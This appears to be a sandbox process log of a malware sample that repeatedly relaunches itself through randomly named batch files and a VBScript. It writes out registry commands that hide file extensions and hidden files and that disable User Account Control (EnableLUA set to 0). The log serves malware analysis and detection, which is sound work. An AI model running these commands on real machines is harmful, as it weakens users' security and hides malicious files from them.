C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AmEYMwQw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dAUUIAwA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\issowQIs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wuggccwc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JskYMkwY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PcswMEAk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KygwwAYs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lcsUUAYg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TgEIYYEQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qAwMMEYw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HuoQAwAg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SQIMokkw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scIMsYEU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GwwsEAcA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qEwIokgs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tiMwgocs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NOAMIwIw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IawsUQUo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XikocAEU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EQcIgoAA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

